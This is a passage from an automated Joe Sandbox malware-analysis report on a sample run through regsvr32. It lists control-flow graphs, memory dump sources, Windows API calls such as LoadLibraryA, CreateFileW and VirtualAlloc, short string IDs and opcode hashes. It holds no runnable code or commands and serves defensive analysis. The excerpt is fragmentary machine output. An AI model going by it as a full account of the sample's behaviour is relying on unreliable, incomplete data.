                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateEventHandleOverlappedResult
                                                                              • String ID:
                                                                              • API String ID: 3756958029-0
                                                                              • Opcode ID: 9ad01a1efdc722d8725f6564751104539f854fcf843f6cc093d9607c21da64dc
                                                                              • Instruction ID: 09629becd0e96d21367f7999c8281521745ef32a758ae7708f8b54a391080136
                                                                              • Opcode Fuzzy Hash: 9ad01a1efdc722d8725f6564751104539f854fcf843f6cc093d9607c21da64dc
                                                                              • Instruction Fuzzy Hash: 4C619162F08A4689FB508A6584B13BC2BB0AB17798F144439DF0DD7B9DDF2CE585A360

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 4262 2fe1dc7-2fe1df7 4263 2fe1df9-2fe1dff 4262->4263 4264 2fe1e43-2fe1e49 4263->4264 4265 2fe1e01-2fe1e07 4263->4265 4266 2fe1e4f-2fe1e55 4264->4266 4267 2fe1fbc-2fe1fc2 4264->4267 4268 2fe1e0d-2fe1e13 4265->4268 4269 2fe1f68-2fe1f6e 4265->4269 4272 2fe1e5b-2fe1e61 4266->4272 4273 2fe2039-2fe203f 4266->4273 4270 2fe207f-2fe2085 4267->4270 4271 2fe1fc8-2fe1fce 4267->4271 4276 2fe1e19-2fe1e1f 4268->4276 4277 2fe2014-2fe201a 4268->4277 4274 2fe205e-2fe2064 4269->4274 4275 2fe1f74-2fe1f7a 4269->4275 4289 2fe208b-2fe2091 4270->4289 4290 2fe21e1-2fe21f7 4270->4290 4278 2fe2154-2fe216e 4271->4278 4279 2fe1fd4-2fe1fda 4271->4279 4280 2fe20ad-2fe20b2 4272->4280 4281 2fe1e67-2fe1e6d 4272->4281 4284 2fe21c9-2fe21dc 4273->4284 4285 2fe2045-2fe204b 4273->4285 4274->4280 4286 2fe2066-2fe206c 4274->4286 4287 2fe2126-2fe212b 4275->4287 4288 2fe1f80-2fe1f86 4275->4288 4291 2fe20b7-2fe20c9 4276->4291 4292 2fe1e25-2fe1e2b 4276->4292 4282 2fe2188-2fe21c4 4277->4282 4283 2fe2020-2fe2026 4277->4283 4278->4263 4299 2fe2173-2fe2183 4279->4299 4300 2fe1fe0-2fe1fe6 4279->4300 4280->4263 4301 2fe20f4-2fe2105 4281->4301 4302 2fe1e73-2fe1e79 4281->4302 4282->4263 4303 2fe21fc-2fe2202 4283->4303 4304 2fe202c-2fe2034 4283->4304 4284->4263 4285->4263 4305 2fe2051-2fe2059 4285->4305 4286->4263 4306 2fe2072-2fe207a 4286->4306 4294 2fe2130-2fe213b 4287->4294 4295 2fe1f8c-2fe1f92 4288->4295 4296 2fe2140-2fe214f 4288->4296 4289->4263 4293 2fe2097-2fe20a8 4289->4293 4290->4263 4291->4263 4297 2fe20ce-2fe20ef LoadLibraryA 4292->4297 4298 2fe1e31-2fe1e37 4292->4298 4293->4263 4294->4263 4295->4263 4307 2fe1f98-2fe1fb7 4295->4307 4296->4263 4297->4263 4298->4263 4309 2fe1e39-2fe1e41 4298->4309 4299->4263 4300->4263 4310 2fe1fec-2fe200f 4300->4310 4301->4263 4302->4263 4311 2fe1e7f-2fe1e8c 4302->4311 4303->4263 4308 2fe2208-2fe2218 4303->4308 4304->4294 4305->4263 4306->4263 4307->4263 4309->4263 4310->4263 4312 2fe1e8e-2fe1e8f 4311->4312 4313 2fe1e94-2fe1e9f 4312->4313 4314 2fe1ea2-2fe1ea9 4313->4314 4315 2fe1ecf-2fe1ed6 4314->4315 4316 2fe1eab-2fe1eb2 4314->4316 4317 2fe1ed8-2fe1edf 4315->4317 4318 2fe1f03-2fe1f1d 4315->4318 4319 2fe1eec-2fe1ef3 4316->4319 4320 2fe1eb4-2fe1ebb 4316->4320 4321 2fe1f2a-2fe1f40 4317->4321 4322 2fe1ee1-2fe1ee8 4317->4322 4318->4314 4323 2fe1f1f-2fe1f25 4319->4323 4324 2fe1ef5-2fe1efc 4319->4324 4325 2fe1f5d-2fe1f63 4320->4325 4326 2fe1ec1-2fe1ec8 4320->4326 4321->4313 4322->4314 4327 2fe1eea-2fe1f58 4322->4327 4323->4314 4324->4314 4328 2fe1efe-2fe1f01 4324->4328 4325->4312 4326->4314 4329 2fe1eca-2fe2121 4326->4329 4327->4313 4328->4314 4329->4263
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2136151078.0000000002F90000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_2f90000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: 5\~$5\~$@$d
                                                                              • API String ID: 1029625771-872558757
                                                                              • Opcode ID: 432abaf52b1931f4a4d756fa3dc7670f7fdf06fad49cd8c3503e079c7b5aee6c
                                                                              • Instruction ID: f1c96c25251ca690118433b41cb20702e240131f77276febbdd245316987f3cc
                                                                              • Opcode Fuzzy Hash: 432abaf52b1931f4a4d756fa3dc7670f7fdf06fad49cd8c3503e079c7b5aee6c
                                                                              • Instruction Fuzzy Hash: 61A16815B2C7454BDF2E451A44B123E33CAFB99684F74152EEBCF82A92D7609D47C283

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 4332 7ffd34939060-7ffd34939097 call 7ffd349471c0 4335 7ffd349390a3-7ffd349390dd call 7ffd349497b0 4332->4335 4336 7ffd34939099-7ffd3493909e 4332->4336 4340 7ffd349390df-7ffd349390e2 4335->4340 4341 7ffd349390e7-7ffd349390f1 4335->4341 4337 7ffd3493927b-7ffd3493928a 4336->4337 4340->4337 4342 7ffd349390f3-7ffd349390f5 4341->4342 4343 7ffd349390f9-7ffd349390fb 4341->4343 4344 7ffd349390fd-7ffd34939101 4342->4344 4346 7ffd349390f7 4342->4346 4343->4344 4345 7ffd34939158-7ffd3493915c 4343->4345 4347 7ffd3493910d-7ffd34939116 4344->4347 4348 7ffd34939103-7ffd34939107 4344->4348 4349 7ffd3493924d-7ffd3493925a 4345->4349 4350 7ffd34939162-7ffd34939166 4345->4350 4346->4347 4352 7ffd3493912d-7ffd34939130 4347->4352 4353 7ffd34939118-7ffd34939121 4347->4353 4348->4347 4348->4349 4349->4337 4351 7ffd3493925c-7ffd34939276 call 7ffd348efe90 4349->4351 4350->4349 4354 7ffd3493916c-7ffd34939170 4350->4354 4351->4337 4357 7ffd34939132-7ffd3493913b 4352->4357 4358 7ffd34939177-7ffd34939187 4352->4358 4356 7ffd34939123-7ffd34939126 4353->4356 4353->4357 4354->4347 4359 7ffd34939172 4354->4359 4361 7ffd3493913d-7ffd34939141 4356->4361 4362 7ffd34939128-7ffd3493912b 4356->4362 4357->4361 4357->4362 4358->4362 4363 7ffd34939189 4358->4363 4359->4349 4365 7ffd34939143-7ffd34939156 4361->4365 4366 7ffd3493918b-7ffd3493918d 4361->4366 4364 7ffd349391a7-7ffd349391df CreateFileW 4362->4364 4363->4361 4369 7ffd349391e5-7ffd349391ec 4364->4369 4370 7ffd3493928b-7ffd349392a3 GetLastError 4364->4370 4365->4364 4367 7ffd3493918f-7ffd34939196 4366->4367 4368 7ffd3493919a-7ffd3493919c 4366->4368 4371 7ffd349391a2 4367->4371 4372 7ffd34939198 4367->4372 4368->4349 4368->4371 4375 7ffd349391ee-7ffd349391f2 4369->4375 4376 7ffd34939227-7ffd3493922c 4369->4376 4373 7ffd3493922e-7ffd34939245 call 7ffd348efe90 4370->4373 4374 7ffd349392a5 4370->4374 4371->4364 4372->4364 4377 7ffd34939248-7ffd3493924b 4373->4377 4374->4377 4375->4376 4378 7ffd349391f4-7ffd349391fe GetLastError 4375->4378 4376->4373 4376->4377 4377->4337 4378->4376 4380 7ffd34939200-7ffd34939221 SetFileInformationByHandle 4378->4380 4380->4376 4382 7ffd349392a7-7ffd349392c2 GetLastError call 7ffd349929dc 4380->4382 4385 7ffd349392c4-7ffd349392d3 call 7ffd348efe90 4382->4385 4386 7ffd349392d8-7ffd349392e0 4382->4386 4385->4386 4386->4337
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1452528299-0
                                                                              • Opcode ID: 500c22ea5d1c7f879a626e7af5a88f5d3f78f08348a645fc4fd2ea38574c4cde
                                                                              • Instruction ID: a38cc0b7e886a8c085328dfd3a2f497690e8e3bb2f29b2d70d8a6c1808818c09
                                                                              • Opcode Fuzzy Hash: 500c22ea5d1c7f879a626e7af5a88f5d3f78f08348a645fc4fd2ea38574c4cde
                                                                              • Instruction Fuzzy Hash: 96611592F0C65245FB65866184B43BA27E86B07BD8F044139DF4D97BCDCE3DE845AB20
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: 43d2fbeffe80e2b634febcdea785d4c16874e7fe28f13b5a2a25b6f10d7b6f82
                                                                              • Instruction ID: 421ef34fdad95b030717c913eb34bc2b47156bca157b72f4556fa574d9108474
                                                                              • Opcode Fuzzy Hash: 43d2fbeffe80e2b634febcdea785d4c16874e7fe28f13b5a2a25b6f10d7b6f82
                                                                              • Instruction Fuzzy Hash: D0025932B0CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: 01fa707cee9f390a062fa6ed25a6b583addd28d0ecc5d7cd671abc7ad59aeda4
                                                                              • Instruction ID: a0ccf34dafec2ed17391d1e95c7926c5b81bc8b7aaa70af00f5b137368b2274d
                                                                              • Opcode Fuzzy Hash: 01fa707cee9f390a062fa6ed25a6b583addd28d0ecc5d7cd671abc7ad59aeda4
                                                                              • Instruction Fuzzy Hash: BF025932B0CAC690EA759B15F4907EBA360FB86B84F444126DB8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: d3bbd176f2e146ea7c1c3b66c09cd2a3d9582550e46b3f019df6469dd46d896b
                                                                              • Instruction ID: d2874a0f5f2db1fe4fc2746e025f6bfd9c6b2953e5db7e3e77d4bcc8fe2d9d91
                                                                              • Opcode Fuzzy Hash: d3bbd176f2e146ea7c1c3b66c09cd2a3d9582550e46b3f019df6469dd46d896b
                                                                              • Instruction Fuzzy Hash: 76026B3270CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: ac177cde55d934ea3229f6e46727efc95247684de5b235848fd492cd54ea5883
                                                                              • Instruction ID: 86b711a56954de47a1b2250963d1b28a39d2f189b8891af6204f27304c20f241
                                                                              • Opcode Fuzzy Hash: ac177cde55d934ea3229f6e46727efc95247684de5b235848fd492cd54ea5883
                                                                              • Instruction Fuzzy Hash: B3025932B0CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: e569dd2791f8ce051f7617b4e522db9f74cb217e870ec011aaa6c020ba1508ba
                                                                              • Instruction ID: 94923a4043559effd41c17893907330a43ae510be0a763ba5a9fc0645c5564bb
                                                                              • Opcode Fuzzy Hash: e569dd2791f8ce051f7617b4e522db9f74cb217e870ec011aaa6c020ba1508ba
                                                                              • Instruction Fuzzy Hash: 5D026A32B0CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 7199 7ffcf4495829-7ffcf4495851 7201 7ffcf4495817 7199->7201 7202 7ffcf4495853 7199->7202 7203 7ffcf4495821-7ffcf4495826 7201->7203 7204 7ffcf449581c call 7ffcf4494340 7201->7204 7205 7ffcf4495855-7ffcf44958a9 call 7ffcf4492a68 call 7ffcf4492a90 7202->7205 7206 7ffcf44958cd-7ffcf4495903 call 7ffcf4492bc8 call 7ffcf4492bf0 7202->7206 7204->7203 7224 7ffcf44958ae-7ffcf44958cb 7205->7224 7218 7ffcf4495905-7ffcf4495928 call 7ffcf4495520 7206->7218 7219 7ffcf4495929-7ffcf4495957 call 7ffcf4492c18 7206->7219 7218->7219 7233 7ffcf44959fd-7ffcf4495a2b call 7ffcf4494390 7219->7233 7234 7ffcf449595d-7ffcf4495968 7219->7234 7224->7206 7245 7ffcf4496455-7ffcf4496478 call 7ffcf44943b8 7233->7245 7246 7ffcf4495a31-7ffcf4495a52 call 7ffcf44954d8 7233->7246 7235 7ffcf449596a-7ffcf4495976 7234->7235 7236 7ffcf44959bb-7ffcf44959fc call 7ffcf44954b0 7234->7236 7236->7233 7258 7ffcf4495a57-7ffcf4495a89 call 7ffcf44943e0 7245->7258 7259 7ffcf449647e-7ffcf44964a1 call 7ffcf44943b8 7245->7259 7246->7245 7269 7ffcf4495a8b-7ffcf4495aaf call 7ffcf4494408 7258->7269 7270 7ffcf4495ab0-7ffcf4495abb 7258->7270 7259->7245 7268 7ffcf44964a3-7ffcf44964df call 7ffcf4494340 7259->7268 7298 7ffcf44964e1-7ffcf4496522 call 7ffcf4495438 7268->7298 7269->7270 7271 7ffcf4495abd-7ffcf4495ae1 call 7ffcf4494408 7270->7271 7272 7ffcf4495ae2-7ffcf4495aed 7270->7272 7271->7272 7277 7ffcf4495aef-7ffcf4495b0e call 7ffcf4494430 7272->7277 7278 7ffcf4495b13-7ffcf4495b1e 7272->7278 7277->7278 7280 7ffcf4495b8f-7ffcf4495beb call 7ffcf4494480 7278->7280 7281 7ffcf4495b20-7ffcf4495b44 call 7ffcf4494458 7278->7281 7313 7ffcf4495b68-7ffcf4495b83 7280->7313 7314 7ffcf4495bf1-7ffcf4495c14 call 7ffcf44944a8 7280->7314 7281->7280 7308 7ffcf4496528-7ffcf449652a 7298->7308 7309 7ffcf4496693-7ffcf44966ae 7298->7309 7308->7309 7311 7ffcf4496530-7ffcf4496532 7308->7311 7324 7ffcf44966b5-7ffcf44966d7 7309->7324 7311->7298 7316 7ffcf4496534-7ffcf449655e call 7ffcf4495460 7311->7316 7325 7ffcf4495b8a 7313->7325 7329 7ffcf4495b46-7ffcf4495b61 7314->7329 7330 7ffcf4495c1a-7ffcf4495d4c call 7ffcf4494b78 call 7ffcf4495540 call 7ffcf44944d0 call 7ffcf44944f8 call 7ffcf4494520 7314->7330 7316->7324 7335 7ffcf4496564-7ffcf449657d 7316->7335 7347 7ffcf44966d8-7ffcf44966e7 call 7ffcf44943b8 7324->7347 7325->7280 7329->7313 7330->7325 7393 7ffcf4495d52-7ffcf4495d8c call 7ffcf4494548 7330->7393 7341 7ffcf449657f-7ffcf44965b4 call 7ffcf4495438 7335->7341 7342 7ffcf44965d2-7ffcf449666a call 7ffcf4495488 call 7ffcf44954b0 7335->7342 7356 7ffcf44965b9-7ffcf44965c0 7341->7356 7385 7ffcf449666f 7342->7385 7347->7268 7358 7ffcf44966ed 7347->7358 7359 7ffcf44965c6-7ffcf44965c8 7356->7359 7360 7ffcf4496671-7ffcf449668c 7356->7360 7358->7245 7359->7360 7363 7ffcf44965ce-7ffcf44965d0 7359->7363 7360->7309 7363->7341 7363->7342 7385->7347 7397 7ffcf4495d91-7ffcf4495dc2 call 7ffcf4494570 7393->7397 7397->7245
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: :$H
                                                                              • API String ID: 0-1599246672
                                                                              • Opcode ID: 0aa0c20f71d049c58fdc7db36e9dcd4046f97113a9619efc772a2962bdbf7f37
                                                                              • Instruction ID: 19a2eaedb5228019aea8a74cbdac857163b5ec59f1f83393ae413ae327648384
                                                                              • Opcode Fuzzy Hash: 0aa0c20f71d049c58fdc7db36e9dcd4046f97113a9619efc772a2962bdbf7f37
                                                                              • Instruction Fuzzy Hash: 1222F852F1C96A4BFB95E72884B5378EAD2EF84714F480179D01DE32CBCE28AC41D769
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2136151078.0000000002F90000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_2f90000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 8b5c64e0111f0c9f7a75e77ea5bdc65aabc36e30693f977857ec78a3b3b05715
                                                                              • Instruction ID: 0cf515aff055a7502f8cd91b84ab4b7cf6a69ccaf8eefeb170c2d1caf8b53bf0
                                                                              • Opcode Fuzzy Hash: 8b5c64e0111f0c9f7a75e77ea5bdc65aabc36e30693f977857ec78a3b3b05715
                                                                              • Instruction Fuzzy Hash: EB62F761B2C6058BCF2E551D44E423E6292BF84B88F64093EE69BD7B51DB70DC81CB87

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 7991 7ffcf449cecd-7ffcf449cef2 7992 7ffcf449cef4-7ffcf449cf0a 7991->7992 7993 7ffcf449cf3f-7ffcf449cf40 7991->7993 8000 7ffcf449cf57-7ffcf449cf8a 7992->8000 8001 7ffcf449cf0c-7ffcf449ddee 7992->8001 7994 7ffcf44e2900-7ffcf44e2930 call 7ffcf44dc4e8 7993->7994 8002 7ffcf44e2935-7ffcf44e2937 7994->8002 8015 7ffcf449cf8c-7ffcf449cf8f 8000->8015 8016 7ffcf449cf90-7ffcf44e3ab0 8000->8016 8004 7ffcf449ddf4-7ffcf449de1a call 7ffcf449d570 8001->8004 8005 7ffcf449df7c-7ffcf449dfbc call 7ffcf4496db0 8001->8005 8006 7ffcf44e2939-7ffcf44e2951 8002->8006 8007 7ffcf44e2952-7ffcf44e295a 8002->8007 8021 7ffcf449de20-7ffcf449de73 call 7ffcf449d598 8004->8021 8022 7ffcf449dfc3-7ffcf449e041 call 7ffcf4496db0 * 2 8004->8022 8005->8022 8015->8016 8032 7ffcf44e3aca-7ffcf44e3ace 8016->8032 8033 7ffcf44e3ab2-7ffcf44e3ac5 call 7ffcf44e2dc0 8016->8033 8068 7ffcf449de75-7ffcf449de78 8021->8068 8069 7ffcf449de7a-7ffcf449de81 8021->8069 8057 7ffcf449e045-7ffcf449e082 call 7ffcf44930d0 8022->8057 8058 7ffcf449e043 8022->8058 8037 7ffcf44e3ad0-7ffcf44e3adb 8032->8037 8038 7ffcf44e3adc-7ffcf44e3ae9 8032->8038 8033->8032 8040 7ffcf44e3f49-7ffcf44e3f77 8038->8040 8041 7ffcf44e3aef-7ffcf44e3b02 8038->8041 8056 7ffcf44e3f78-7ffcf44e3f91 call 7ffcf4494340 8040->8056 8042 7ffcf44e3b04-7ffcf44e3b0f 8041->8042 8043 7ffcf44e3b10-7ffcf44e3b1b 8041->8043 8046 7ffcf44e3b21-7ffcf44e3b2d 8043->8046 8047 7ffcf44e3d72-7ffcf44e3d97 call 7ffcf44dc538 8043->8047 8046->8040 8049 7ffcf44e3b33-7ffcf44e3b4e 8046->8049 8061 7ffcf44e3d9e-7ffcf44e3dc3 call 7ffcf44dc538 8047->8061 8054 7ffcf44e3b50-7ffcf44e3b5b 8049->8054 8055 7ffcf44e3b5c-7ffcf44e3b60 8049->8055 8060 7ffcf44e3b66-7ffcf44e3b72 8055->8060 8055->8061 8083 7ffcf44e3f93-7ffcf44e3ff7 8056->8083 8058->8057 8064 7ffcf449e085-7ffcf449e0b4 8058->8064 8060->8040 8067 7ffcf44e3b78-7ffcf44e3b93 8060->8067 8086 7ffcf44e3dca-7ffcf44e3def call 7ffcf44dc538 8061->8086 8064->7994 8075 7ffcf44e3b95-7ffcf44e3b9a 8067->8075 8076 7ffcf44e3b9f-7ffcf44e3ba3 8067->8076 8068->8069 8077 7ffcf449dea9-7ffcf449dec8 call 7ffcf449d5c0 8069->8077 8078 7ffcf449de83-7ffcf449dea7 call 7ffcf449d658 8069->8078 8084 7ffcf44e3d6b-7ffcf44e3d71 8075->8084 8085 7ffcf44e3ba9-7ffcf44e3bb5 8076->8085 8076->8086 8103 7ffcf449decd-7ffcf449deec 8077->8103 8078->8103 8085->8040 8091 7ffcf44e3bbb-7ffcf44e3bd6 8085->8091 8101 7ffcf44e3df6-7ffcf44e3e1b call 7ffcf44dc538 8086->8101 8095 7ffcf44e3bd8-7ffcf44e3bdd 8091->8095 8096 7ffcf44e3be2-7ffcf44e3be6 8091->8096 8095->8084 8096->8101 8102 7ffcf44e3bec-7ffcf44e3bf8 8096->8102 8113 7ffcf44e3e22-7ffcf44e3e47 call 7ffcf44dc538 8101->8113 8102->8040 8108 7ffcf44e3bfe-7ffcf44e3c19 8102->8108 8103->8005 8109 7ffcf44e3c1b-7ffcf44e3c20 8108->8109 8110 7ffcf44e3c25-7ffcf44e3c29 8108->8110 8109->8084 8110->8113 8114 7ffcf44e3c2f-7ffcf44e3c3b 8110->8114 8127 7ffcf44e3e4e-7ffcf44e3e73 call 7ffcf44dc538 8113->8127 8114->8040 8118 7ffcf44e3c41-7ffcf44e3c5c 8114->8118 8122 7ffcf44e3c68-7ffcf44e3c6c 8118->8122 8123 7ffcf44e3c5e-7ffcf44e3c63 8118->8123 8126 7ffcf44e3c72-7ffcf44e3c7e 8122->8126 8122->8127 8123->8084 8126->8040 